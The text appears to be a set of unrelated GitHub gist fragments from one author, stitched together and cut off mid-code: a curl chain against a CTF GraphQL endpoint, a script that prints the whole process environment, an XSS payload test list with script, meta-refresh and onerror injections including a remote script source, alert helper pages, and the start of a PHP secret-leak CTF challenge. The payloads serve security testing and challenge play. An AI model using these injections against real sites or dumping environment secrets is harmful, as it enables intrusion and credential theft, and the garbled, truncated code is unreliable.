# Three-step chain; each step runs only if the previous one exited with status 0:
#   1. run the query generator script,
#   2. POST query.json as JSON to the GraphQL endpoint (timed) and save the
#      response body to response.json,
#   3. run the decoder script.
# NOTE(review): presumably generate_gql_mysql.rb writes query.json and decode.rb
# reads response.json; neither script is visible here, so confirm.
# NOTE(review): curl exits 0 on HTTP 4xx/5xx responses unless --fail is given, so
# decode.rb also runs when response.json holds an error body.
ruby generate_gql_mysql.rb \
  && time curl --request POST \
       --header "Content-Type: application/json" \
       --data @query.json \
       https://gql-ctf-2.herokuapp.com/graphql.json > response.json \
  && ruby decode.rb
# Prints the entire process environment to stdout, framed by two marker lines
# and followed by one empty line.
# Caution: environment variables frequently hold credentials (API keys, tokens,
# connection strings), so any place this output is captured, such as CI or
# build logs, should be treated as sensitive.
printf '%s\n' "printenv-ing"
printenv
printf '%s\n' "done"
printf '%s\n' ""
require 'securerandom' | |
require 'password_strength' | |
require 'benchmark' | |
# Builds a random string of +len+ characters from a cryptographically secure source.
#
# SecureRandom.base64(len) encodes +len+ random bytes, which yields at least
# +len+ Base64 characters; the result is cut to the first +len+ of them, so no
# "=" padding is included. Characters come from the standard Base64 alphabet
# (A-Z, a-z, 0-9, "+" and "/"), i.e. 6 random bits per character.
#
# @param len [Integer] number of characters wanted
# @return [String] random string of +len+ Base64-alphabet characters
def random_string(len)
  encoded = SecureRandom.base64(len)
  encoded[0...len]
end
Benchmark.bm do |x| |
<html> | |
<script> | |
var xsss = [ | |
'<script >alert("XSS - 1");</script >', | |
'<script type="application/javascript">alert("XSS - 2");</script >', | |
'<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >', | |
'<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />', | |
'<input type="image" src onerror="alert(\"XSS - 5\")">', | |
'<object data="a.a" onerror="alert(\"XSS - 6\")" />', | |
'<object data="a.a" onerror="alert(\"XSS - 7\")">', |
<html>
<script>
/*
  Usage: add a GET parameter "msg", e.g. "?msg=Some message".

  The text following "?msg=" in the page URL is URI-decoded and displayed with
  alert(). alert() shows its argument as plain text, so the value is not parsed
  as HTML. When "?msg=" is absent the dialog shows "undefined"; a malformed
  percent-escape makes decodeURI throw a URIError.
*/
(function () {
  var rawMessage = window.location.href.split('?msg=')[1];
  window.alert(decodeURI(rawMessage));
})();
</script>
</html>
// Displays a message chosen from the <script> element that loaded this file:
//   1. its "msg" attribute, if present and non-empty;
//   2. otherwise the text after "msg=" in its "src" attribute;
//   3. otherwise the literal "XSS!".
// The value is passed to alert(), which shows it as plain text.
(function () {
  var tag = document.currentScript;
  var text = tag.getAttribute('msg') || tag.getAttribute('src').split('msg=')[1] || "XSS!";
  alert(text);
})();
<?php | |
/* | |
Run using: | |
SECRET="Some super secret text" php -S localhost:8000 | |
Goal: | |
Find out what the SECRET env is | |
*/ | |
if (empty($_POST['hmac']) || empty($_POST['host'])) { |
#!/bin/bash | |
# install by adding: | |
# alias venv=". ~/location/venv.sh" | |
# to .bashrc | |
help_string="venv [option] [VENV_NAME] | |
VENV_NAME | |
activates VENV_NAME is it exists |
I hereby claim:
- I am cianmce on github.
- I am cianmce (https://keybase.io/cianmce) on keybase.
- I have a public key whose fingerprint is 95D8 378B 422A 8F0F 3585 749E 0CA9 E26E 2130 99FB
To claim this, I am signing this object: